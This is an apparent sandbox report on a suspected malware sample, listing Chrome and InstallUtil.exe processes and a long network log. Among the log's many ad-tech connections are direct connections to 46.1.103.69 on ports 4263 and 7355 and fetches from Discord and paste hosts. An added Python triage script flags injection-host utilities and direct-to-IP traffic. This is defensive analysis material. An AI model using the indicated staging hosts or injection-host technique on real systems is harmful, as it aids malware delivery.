"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=5768 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=7384 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=7980 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=7616 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=7252 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=3228 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=6572 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=6900 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=8404 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:2

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
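
Added example, not part of the sandbox report: a short Python triage pass over the Processes list above and the Network table that follows. It collapses Chrome's own `--type=` helper processes (browser noise), flags executables running from a user-writable path (ChromeCrt.exe under AppData\Roaming), flags .NET framework utilities launched with no arguments (InstallUtil.exe does nothing useful on its own and is commonly spawned only as a host for injected code), separates resolver/PTR/mDNS chatter from real connections, and surfaces connections that had no preceding name resolution (46.1.103.69 on ports 4263 and 7355) or that went to public hosting services. The sample lines are copied from this report; the INJECTION_HOSTS and HOSTING_SERVICES sets and the verdict labels are the example's own assumptions, not the sandbox's.

```python
"""Triage pass over a sandbox report's Processes and Network sections.

Added example, not part of the original report. The sample lines below are
copied from the report; the classification sets are the author's assumptions.
"""
import re
from collections import Counter

# Processes section excerpt: a path line followed by its command-line line.
PROCESS_LINES = [
    r"C:\Program Files\Google\Chrome\Application\chrome.exe",
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility '
    r"--utility-sub-type=quarantine.mojom.Quarantine --lang=en-US "
    r"--service-sandbox-type=none --mojo-platform-channel-handle=5584 /prefetch:8",
    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"',
    r"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe",
    r"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe",
]

# Network section excerpt: "Country Destination [Domain] Proto"; the Domain
# column is empty when no name resolution preceded the connection.
NETWORK_LINES = [
    "US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp",
    "US 8.8.8.8:53 textbin.net udp",
    "US 148.72.177.212:443 textbin.net tcp",
    "US 162.159.129.233:443 cdn.discordapp.com tcp",
    "TR 46.1.103.69:4263 tcp",
    "TR 46.1.103.69:7355 tcp",
    "US 104.16.113.74:443 mediafire.com tcp",
    "N/A 224.0.0.251:5353 udp",
]

# .NET framework utilities that do nothing useful without arguments and are
# therefore commonly spawned only to host injected code (assumed list).
INJECTION_HOSTS = {"installutil.exe", "regasm.exe", "regsvcs.exe", "aspnet_compiler.exe"}

# Public hosting/paste services frequently used to stage payloads (assumed list;
# the report's "legitimate hosting services abused" signature names none).
HOSTING_SERVICES = {"cdn.discordapp.com", "img.guildedcdn.com", "textbin.net"}


def split_args(path, cmdline):
    """Return the arguments that follow the (optionally quoted) executable path."""
    m = re.match(r'^"?' + re.escape(path) + r'"?\s*(.*)$', cmdline, re.IGNORECASE)
    return m.group(1).strip() if m else cmdline.strip()


def triage_processes(lines):
    """Classify each path/command-line pair; returns [(verdict, path), ...]."""
    verdicts = []
    for path, cmdline in zip(lines[0::2], lines[1::2]):
        name = path.rsplit("\\", 1)[-1].lower()
        args = split_args(path, cmdline)
        if name == "chrome.exe" and "--type=" in args:
            verdicts.append(("browser_child", path))          # Chrome's own helper processes
        elif path.lower().startswith("c:\\users\\"):
            verdicts.append(("user_writable_exe", path))      # dropped/persisted binary
        elif name in INJECTION_HOSTS and not args:
            verdicts.append(("injection_host_no_args", path))
        else:
            verdicts.append(("other", path))
    return verdicts


def parse_network_row(row):
    """Split one table row into (country, ip, port, domain, proto)."""
    parts = row.split()
    domain = parts[2] if len(parts) == 4 else ""
    ip, port = parts[1].rsplit(":", 1)
    return parts[0], ip, int(port), domain, parts[-1]


def triage_network(rows):
    """Count rows per verdict and list the (host, port) pairs worth a closer look."""
    counts, flagged = Counter(), []
    for row in rows:
        _country, ip, port, domain, _proto = parse_network_row(row)
        if port == 53 or domain.endswith(".in-addr.arpa") or ip.startswith("224."):
            counts["dns_or_mdns"] += 1                        # resolver, PTR and mDNS chatter
        elif not domain:
            counts["direct_to_ip"] += 1                       # no DNS lookup before connecting
            flagged.append((ip, port))
        elif domain in HOSTING_SERVICES:
            counts["hosting_service"] += 1
            flagged.append((domain, port))
        else:
            counts["other_https" if port == 443 else "other"] += 1
    return counts, flagged


if __name__ == "__main__":
    for verdict, path in triage_processes(PROCESS_LINES):
        print(f"{verdict:24} {path}")
    counts, flagged = triage_network(NETWORK_LINES)
    print(dict(counts))
    for host, port in flagged:
        print(f"review: {host}:{port}")
```

Feed the two sections in full rather than the excerpt to get the real picture: the dozens of ad-tech and analytics hosts reached after mediafire.com land in `other_https` and are what a browser visit produces, while the rows that deserve an analyst's time are the direct-to-IP connections on non-standard ports, the hosting-service fetches, and the two processes that are not Chrome.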

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.113.22.20.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 img.guildedcdn.com udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 8.8.8.8:53 31.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 203.33.253.131.in-addr.arpa udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 17.14.97.104.in-addr.arpa udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 8.8.8.8:53 textbin.net udp
US 148.72.177.212:443 textbin.net tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 212.177.72.148.in-addr.arpa udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:4263 tcp
US 8.8.8.8:53 69.103.1.46.in-addr.arpa udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 162.159.129.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:4263 tcp
TR 46.1.103.69:7355 tcp
TR 46.1.103.69:4263 tcp
TR 46.1.103.69:7355 tcp
US 8.8.8.8:53 img.guildedcdn.com udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 148.72.177.212:443 textbin.net tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:4263 tcp
US 8.8.8.8:53 170.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
NL 142.251.36.46:443 clients2.google.com udp
NL 142.251.36.46:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 46.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 mediafire.com udp
US 104.16.113.74:443 mediafire.com tcp
US 104.16.113.74:443 mediafire.com tcp
US 8.8.8.8:53 www.mediafire.com udp
US 8.8.8.8:53 static.mediafire.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
NL 172.217.168.202:443 ajax.googleapis.com tcp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 8.8.8.8:53 cdn.amplitude.com udp
US 104.16.57.101:443 static.cloudflareinsights.com tcp
US 18.239.63.113:443 cdn.amplitude.com tcp
US 8.8.8.8:53 74.113.16.104.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 202.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 113.63.239.18.in-addr.arpa udp
US 8.8.8.8:53 101.57.16.104.in-addr.arpa udp
US 8.8.8.8:53 200.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 api.amplitude.com udp
US 54.244.175.36:443 api.amplitude.com tcp
US 8.8.8.8:53 static.hotjar.com udp
US 18.239.94.35:443 static.hotjar.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
NL 142.250.179.138:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 36.175.244.54.in-addr.arpa udp
US 8.8.8.8:53 35.94.239.18.in-addr.arpa udp
US 8.8.8.8:53 138.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
NL 142.250.102.156:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 script.hotjar.com udp
US 216.239.32.181:443 analytics.google.com tcp
US 18.238.243.111:443 script.hotjar.com tcp
NL 142.250.102.156:443 stats.g.doubleclick.net udp
US 8.8.8.8:53 device.maxmind.com udp
US 162.159.134.22:443 device.maxmind.com tcp
US 8.8.8.8:53 156.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 181.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 111.243.238.18.in-addr.arpa udp
US 8.8.8.8:53 22.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 d-ipv6.mmapiws.com udp
US 172.64.145.79:443 d-ipv6.mmapiws.com tcp
US 8.8.8.8:53 79.145.64.172.in-addr.arpa udp
US 8.8.8.8:53 app.mediafire.com udp
US 216.239.32.181:443 analytics.google.com udp
US 104.16.113.74:443 app.mediafire.com tcp
US 104.16.113.74:443 app.mediafire.com tcp
US 8.8.8.8:53 sessions.bugsnag.com udp
US 35.190.88.7:443 sessions.bugsnag.com tcp
US 35.190.88.7:443 sessions.bugsnag.com udp
NL 172.217.168.202:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 7.88.190.35.in-addr.arpa udp
US 8.8.8.8:53 www.mediafireuserupload.com udp
US 104.16.125.23:443 www.mediafireuserupload.com tcp
US 8.8.8.8:53 23.125.16.104.in-addr.arpa udp
US 8.8.8.8:53 the.gatekeeperconsent.com udp
US 8.8.8.8:53 btloader.com udp
US 172.67.144.62:443 the.gatekeeperconsent.com tcp
US 104.22.75.216:443 btloader.com tcp
US 8.8.8.8:53 www.ezojs.com udp
US 8.8.8.8:53 translate.google.com udp
NL 142.250.179.206:443 translate.google.com tcp
US 172.67.170.144:443 www.ezojs.com tcp
US 104.21.28.48:443 the.gatekeeperconsent.com tcp
US 104.21.28.48:443 the.gatekeeperconsent.com udp
US 172.67.144.62:443 the.gatekeeperconsent.com udp
US 8.8.8.8:53 cdn.otnolatrnup.com udp
US 104.19.214.37:443 cdn.otnolatrnup.com tcp
US 8.8.8.8:53 api.btloader.com udp
US 8.8.8.8:53 ad-delivery.net udp
NL 142.250.179.138:443 content-autofill.googleapis.com udp
US 130.211.23.194:443 api.btloader.com tcp
US 104.26.3.70:443 ad-delivery.net tcp
US 104.26.3.70:443 ad-delivery.net tcp
US 8.8.8.8:53 62.144.67.172.in-addr.arpa udp
US 8.8.8.8:53 216.75.22.104.in-addr.arpa udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 144.170.67.172.in-addr.arpa udp
US 8.8.8.8:53 48.28.21.104.in-addr.arpa udp
US 8.8.8.8:53 37.214.19.104.in-addr.arpa udp
US 8.8.8.8:53 translate.googleapis.com udp
US 8.8.8.8:53 g.ezoic.net udp
NL 142.251.36.10:443 translate.googleapis.com tcp
DE 3.67.181.148:443 g.ezoic.net tcp
US 8.8.8.8:53 go.ezodn.com udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 130.211.23.194:443 api.btloader.com udp
DE 172.217.23.194:443 securepubads.g.doubleclick.net tcp
US 172.64.136.15:443 go.ezodn.com tcp
US 172.64.136.15:443 go.ezodn.com tcp
US 172.64.136.15:443 go.ezodn.com tcp
US 172.67.144.62:443 the.gatekeeperconsent.com udp
US 8.8.8.8:53 otnolatrnup.com udp
US 8.8.8.8:53 btlr.sharethrough.com udp
US 8.8.8.8:53 hbopenbid.pubmatic.com udp
US 8.8.8.8:53 prebid.media.net udp
US 8.8.8.8:53 tlx.3lift.com udp
NL 185.64.189.112:443 hbopenbid.pubmatic.com tcp
US 34.120.63.153:443 prebid.media.net tcp
DE 3.69.135.220:443 tlx.3lift.com tcp
US 8.8.8.8:53 translate-pa.googleapis.com udp
DE 52.29.49.248:443 btlr.sharethrough.com tcp
DE 52.29.49.248:443 btlr.sharethrough.com tcp
DE 52.29.49.248:443 btlr.sharethrough.com tcp
DE 52.29.49.248:443 btlr.sharethrough.com tcp
DE 52.29.49.248:443 btlr.sharethrough.com tcp
US 8.8.8.8:53 194.23.211.130.in-addr.arpa udp
US 8.8.8.8:53 198.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 15.136.64.172.in-addr.arpa udp
US 8.8.8.8:53 148.181.67.3.in-addr.arpa udp
US 8.8.8.8:53 194.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 112.189.64.185.in-addr.arpa udp
US 8.8.8.8:53 70.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 10.36.251.142.in-addr.arpa udp
US 172.64.136.15:443 go.ezodn.com udp
DE 172.217.23.194:443 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
NL 142.250.179.206:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 153.63.120.34.in-addr.arpa udp
US 8.8.8.8:53 248.49.29.52.in-addr.arpa udp
US 8.8.8.8:53 220.135.69.3.in-addr.arpa udp
NL 142.250.179.206:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
NL 142.251.36.1:443 lh3.googleusercontent.com udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 eb2.3lift.com udp
US 8.8.8.8:53 ads.pubmatic.com udp
US 8.8.8.8:53 contextual.media.net udp
US 76.223.111.18:443 eb2.3lift.com tcp
NL 104.85.0.200:443 ads.pubmatic.com tcp
NL 104.85.0.23:443 contextual.media.net tcp
US 8.8.8.8:53 200.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 130.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 23.0.85.104.in-addr.arpa udp
US 76.223.111.18:443 eb2.3lift.com tcp
US 8.8.8.8:53 image6.pubmatic.com udp
GB 185.64.190.78:443 image6.pubmatic.com tcp
US 8.8.8.8:53 sync.mathtag.com udp
US 8.8.8.8:53 dis.criteo.com udp
CH 185.29.132.241:443 sync.mathtag.com tcp
NL 178.250.1.9:443 dis.criteo.com tcp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
IE 52.95.126.160:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 cms.quantserve.com udp
US 8.8.8.8:53 cm.g.doubleclick.net udp
US 8.8.8.8:53 cr.frontend.weborama.fr udp
US 8.8.8.8:53 sync.crwdcntrl.net udp
US 8.8.8.8:53 um.simpli.fi udp
US 8.8.8.8:53 a.audrte.com udp
US 8.8.8.8:53 c1.adform.net udp
US 8.8.8.8:53 match.adsrvr.org udp
US 8.8.8.8:53 ups.analytics.yahoo.com udp
US 8.8.8.8:53 simage2.pubmatic.com udp
NL 142.250.179.194:443 cm.g.doubleclick.net tcp
NL 142.250.179.194:443 cm.g.doubleclick.net tcp
NL 142.250.179.194:443 cm.g.doubleclick.net tcp
IE 54.74.78.236:443 a.audrte.com tcp
US 52.223.40.198:443 match.adsrvr.org tcp
NL 35.204.74.118:443 um.simpli.fi tcp
IE 52.48.43.143:443 sync.crwdcntrl.net tcp
NL 198.47.127.205:443 simage2.pubmatic.com tcp
US 34.111.129.221:443 cr.frontend.weborama.fr tcp
DK 37.157.2.230:443 c1.adform.net tcp
DE 3.75.62.37:443 ups.analytics.yahoo.com tcp
DE 91.228.74.166:443 cms.quantserve.com tcp
US 8.8.8.8:53 18.111.223.76.in-addr.arpa udp
US 8.8.8.8:53 78.190.64.185.in-addr.arpa udp
US 8.8.8.8:53 9.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 241.132.29.185.in-addr.arpa udp
US 8.8.8.8:53 160.126.95.52.in-addr.arpa udp
US 8.8.8.8:53 image2.pubmatic.com udp
US 34.111.129.221:443 cr.frontend.weborama.fr udp
NL 142.250.179.194:443 cm.g.doubleclick.net udp
US 8.8.8.8:53 194.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 198.40.223.52.in-addr.arpa udp
US 8.8.8.8:53 205.127.47.198.in-addr.arpa udp
US 8.8.8.8:53 221.129.111.34.in-addr.arpa udp
US 8.8.8.8:53 118.74.204.35.in-addr.arpa udp
US 8.8.8.8:53 37.62.75.3.in-addr.arpa udp
US 8.8.8.8:53 236.78.74.54.in-addr.arpa udp
US 8.8.8.8:53 230.2.157.37.in-addr.arpa udp
US 8.8.8.8:53 166.74.228.91.in-addr.arpa udp
US 8.8.8.8:53 143.43.48.52.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 dmp.adform.net udp
US 8.8.8.8:53 simage4.pubmatic.com udp
GB 185.64.190.81:443 simage4.pubmatic.com tcp
US 8.8.8.8:53 81.190.64.185.in-addr.arpa udp
NL 142.251.36.10:443 translate-pa.googleapis.com udp
US 8.8.8.8:53 dsp.adfarm1.adition.com udp
US 8.8.8.8:53 ib.adnxs.com udp
US 8.8.8.8:53 t.adx.opera.com udp
US 8.8.8.8:53 sync.srv.stackadapt.com udp
US 8.8.8.8:53 match.prod.bidr.io udp
US 8.8.8.8:53 uipglob.semasio.net udp
US 8.8.8.8:53 pr-bh.ybp.yahoo.com udp
US 8.8.8.8:53 pixel.onaudience.com udp
US 8.8.8.8:53 mwzeom.zeotap.com udp
US 8.8.8.8:53 pubmatic-match.dotomi.com udp
US 8.8.8.8:53 x.bidswitch.net udp
US 8.8.8.8:53 ad.turn.com udp
US 8.8.8.8:53 pixel-sync.sitescout.com udp
DE 85.114.159.118:443 dsp.adfarm1.adition.com tcp
FR 141.94.170.77:443 pixel.onaudience.com tcp
IE 176.34.91.195:443 pr-bh.ybp.yahoo.com tcp
DE 18.159.23.195:443 x.bidswitch.net tcp
DE 37.252.171.53:443 ib.adnxs.com tcp
NL 82.145.213.8:443 t.adx.opera.com tcp
NL 98.98.134.242:443 pixel-sync.sitescout.com tcp
US 52.7.163.13:443 sync.srv.stackadapt.com tcp
DK 77.243.51.122:443 uipglob.semasio.net tcp
NL 63.215.202.140:443 pubmatic-match.dotomi.com tcp
US 172.67.13.182:443 mwzeom.zeotap.com tcp
IE 52.210.8.58:443 match.prod.bidr.io tcp
US 8.8.8.8:53 pool.admedo.com udp
US 8.8.8.8:53 tags.bluekai.com udp
NL 104.99.233.6:443 tags.bluekai.com tcp
BE 35.210.53.219:443 pool.admedo.com tcp
US 8.8.8.8:53 rtb-csync.smartadserver.com udp
BE 35.210.53.219:443 pool.admedo.com udp
FR 185.86.139.103:443 rtb-csync.smartadserver.com tcp
US 8.8.8.8:53 8.213.145.82.in-addr.arpa udp
US 8.8.8.8:53 242.134.98.98.in-addr.arpa udp
US 8.8.8.8:53 118.159.114.85.in-addr.arpa udp
US 8.8.8.8:53 77.170.94.141.in-addr.arpa udp
US 8.8.8.8:53 53.171.252.37.in-addr.arpa udp
US 8.8.8.8:53 140.202.215.63.in-addr.arpa udp
US 8.8.8.8:53 182.13.67.172.in-addr.arpa udp
US 8.8.8.8:53 195.23.159.18.in-addr.arpa udp
US 8.8.8.8:53 195.91.34.176.in-addr.arpa udp
US 8.8.8.8:53 122.51.243.77.in-addr.arpa udp
US 8.8.8.8:53 58.8.210.52.in-addr.arpa udp
US 8.8.8.8:53 13.163.7.52.in-addr.arpa udp
US 8.8.8.8:53 6.233.99.104.in-addr.arpa udp
US 8.8.8.8:53 219.53.210.35.in-addr.arpa udp
US 8.8.8.8:53 103.139.86.185.in-addr.arpa udp
US 8.8.8.8:53 bh.contextweb.com udp
US 208.93.169.131:443 bh.contextweb.com tcp
US 8.8.8.8:53 131.169.93.208.in-addr.arpa udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 192.178.48.227:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 227.48.178.192.in-addr.arpa udp
US 8.8.8.8:53 cm.adgrx.com udp
NL 63.251.232.165:443 cm.adgrx.com tcp
US 8.8.8.8:53 sync-tm.everesttech.net udp
US 151.101.2.49:443 sync-tm.everesttech.net tcp
US 8.8.8.8:53 csync.loopme.me udp
NL 35.214.156.26:443 csync.loopme.me tcp
US 8.8.8.8:53 b1sync.zemanta.com udp
US 8.8.8.8:53 165.232.251.63.in-addr.arpa udp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 b1sync.zemanta.com tcp
US 8.8.8.8:53 d5p.de17a.com udp
SE 213.155.156.181:443 d5p.de17a.com tcp
NL 35.214.156.26:443 csync.loopme.me tcp
US 64.202.112.159:443 b1sync.zemanta.com tcp
US 8.8.8.8:53 p.rfihub.com udp
NL 193.0.160.130:443 p.rfihub.com tcp
US 8.8.8.8:53 ipac.ctnsnet.com udp
US 35.186.193.173:443 ipac.ctnsnet.com tcp
US 8.8.8.8:53 159.112.202.64.in-addr.arpa udp
US 8.8.8.8:53 130.160.0.193.in-addr.arpa udp
US 8.8.8.8:53 181.156.155.213.in-addr.arpa udp
US 8.8.8.8:53 core.iprom.net udp
SI 195.5.165.20:443 core.iprom.net tcp
US 8.8.8.8:53 ad.mrtnsvr.com udp
US 34.102.163.6:443 ad.mrtnsvr.com tcp
US 34.102.163.6:443 ad.mrtnsvr.com tcp
US 8.8.8.8:53 match.adsby.bidtheatre.com udp
NL 134.122.57.34:443 match.adsby.bidtheatre.com tcp
US 8.8.8.8:53 173.193.186.35.in-addr.arpa udp
US 8.8.8.8:53 20.165.5.195.in-addr.arpa udp
US 8.8.8.8:53 6.163.102.34.in-addr.arpa udp
US 8.8.8.8:53 34.57.122.134.in-addr.arpa udp
US 8.8.8.8:53 a.tribalfusion.com udp
US 8.8.8.8:53 cm-supply-web.gammaplatform.com udp
US 104.18.24.173:443 a.tribalfusion.com tcp
SG 35.186.154.107:443 cm-supply-web.gammaplatform.com tcp
US 8.8.8.8:53 green.erne.co udp
FR 141.95.171.141:443 green.erne.co tcp
SG 35.186.154.107:443 cm-supply-web.gammaplatform.com tcp
US 8.8.8.8:53 matching.truffle.bid udp
US 8.8.8.8:53 s.tribalfusion.com udp
US 8.8.8.8:53 pixel-eu.onaudience.com udp
FR 146.59.148.16:443 pixel-eu.onaudience.com tcp
DE 162.55.120.196:443 matching.truffle.bid tcp
US 8.8.8.8:53 173.24.18.104.in-addr.arpa udp
US 8.8.8.8:53 141.171.95.141.in-addr.arpa udp
US 8.8.8.8:53 sync.1rx.io udp
US 46.228.174.117:443 sync.1rx.io tcp
US 8.8.8.8:53 ads.playground.xyz udp
US 34.102.253.54:443 ads.playground.xyz tcp
US 8.8.8.8:53 ad.turn.com udp
NL 46.228.164.11:443 ad.turn.com tcp
US 8.8.8.8:53 16.148.59.146.in-addr.arpa udp
US 8.8.8.8:53 117.174.228.46.in-addr.arpa udp
US 8.8.8.8:53 196.120.55.162.in-addr.arpa udp
US 8.8.8.8:53 54.253.102.34.in-addr.arpa udp
US 8.8.8.8:53 11.164.228.46.in-addr.arpa udp
US 8.8.8.8:53 sync.targeting.unrulymedia.com udp
US 46.228.174.117:443 sync.targeting.unrulymedia.com tcp
NL 142.251.36.46:443 clients2.google.com udp
NL 142.251.36.46:443 clients2.google.com tcp
US 192.178.48.227:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
